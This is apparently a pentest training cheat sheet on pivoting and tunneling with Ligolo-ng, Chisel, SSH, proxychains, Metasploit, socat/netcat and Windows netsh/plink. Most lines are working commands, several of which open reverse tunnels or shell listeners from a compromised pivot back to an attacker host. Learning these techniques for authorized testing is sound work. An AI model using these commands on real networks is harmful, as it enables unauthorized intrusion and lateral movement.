network-pentest

Pivoting & Tunneling

Pivot into internal networks — Ligolo-ng, Chisel, SSH local/remote/dynamic forwards & ProxyJump, proxychains, Metasploit autoroute/socks, socat/netcat relays and native Windows netsh/plink forwarding.

1 views Jun 2026 lazyhackers

Ligolo-ng (5)

./proxy -selfcert -laddr 0.0.0.0:11601

Start the Ligolo-ng proxy on your attack box

ligolo server

./agent -connect 10.10.14.1:11601 -ignore-cert

Run the agent on the pivot (Linux or agent.exe)

ligolo agent

sudo ip route add 10.10.20.0/24 dev ligolo

Route the internal subnet through the ligolo interface

ligolo route

ligolo> session -> start

Pick the agent session and start the tunnel

ligolo

ligolo> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

Reverse port-forward to catch shells from internal hosts

ligolo listener

Chisel (4)

./chisel server -p 8000 --reverse

Start the Chisel server (reverse mode) on the attacker

chisel server

./chisel client 10.10.14.1:8000 R:socks

Reverse SOCKS proxy from the pivot back to you

chisel socks

./chisel client 10.10.14.1:8000 R:3389:127.0.0.1:3389

Reverse single-port forward (e.g. RDP)

chisel portforward

./chisel client 10.10.14.1:8000 8080:10.10.20.5:80

Local forward to an internal host through the pivot

chisel local

SSH Tunneling (4)

ssh -D 1080 -fN user@pivot

Dynamic SOCKS proxy through SSH

ssh socks

ssh -L 8080:10.10.20.5:80 -fN user@pivot

Local port forward to an internal service

ssh local

ssh -R 8080:127.0.0.1:80 -fN [email protected]

Reverse forward — expose a pivot-local service to you

ssh remote

ssh -J user@pivot [email protected]

ProxyJump straight to an internal host

ssh proxyjump

proxychains (use the SOCKS) (4)

echo 'socks5 127.0.0.1 1080' >> /etc/proxychains4.conf

Point proxychains at your SOCKS tunnel

proxychains config

proxychains -q nmap -sT -Pn -n 10.10.20.5

TCP-connect scan through the proxy (no SYN over SOCKS)

proxychains nmap

proxychains -q nxc smb 10.10.20.0/24 -u user -p pass

Run AD tooling across the internal subnet

proxychains ad

proxychains -q xfreerdp /v:10.10.20.5 /u:user

RDP through the tunnel

proxychains rdp

Metasploit / Meterpreter (3)

run autoroute -s 10.10.20.0/24

Add a Meterpreter route to the internal subnet

metasploit autoroute

portfwd add -l 3389 -p 3389 -r 10.10.20.5

Forward an internal port to your localhost

metasploit portfwd

use auxiliary/server/socks_proxy; run

Expose the routes as a SOCKS proxy for proxychains

metasploit socks

socat / netcat Relays (2)

socat TCP-LISTEN:8080,fork TCP:10.10.20.5:80

Simple TCP relay through a Linux pivot

socat relay

mkfifo /tmp/f; nc -lvp 8080 < /tmp/f | nc 10.10.20.5 80 > /tmp/f

Netcat relay without -e

netcat relay

Windows-Side Forwarding (3)

netsh interface portproxy add v4tov4 listenport=3389 connectaddress=10.10.20.5 connectport=3389

Native Windows port forward — nothing to upload

windows netsh

plink.exe -R 8080:127.0.0.1:80 [email protected] -pw pass

SSH reverse tunnel from Windows (plink)

windows plink

chisel.exe client 10.10.14.1:8000 R:socks

Run the Chisel client on Windows

windows chisel

Pivoting & Tunneling

Related Articles

ADCS Attacks (ESC1–ESC16)

Active Directory Attacks

Wireshark for Security Professionals

Golden Ticket Attack — Complete Guide

CPTS Exam Walkthrough

Related Courses

Network Penetration Testing

Networking Fundamentals for Pentesters

Windows Privilege Escalation — Complete Course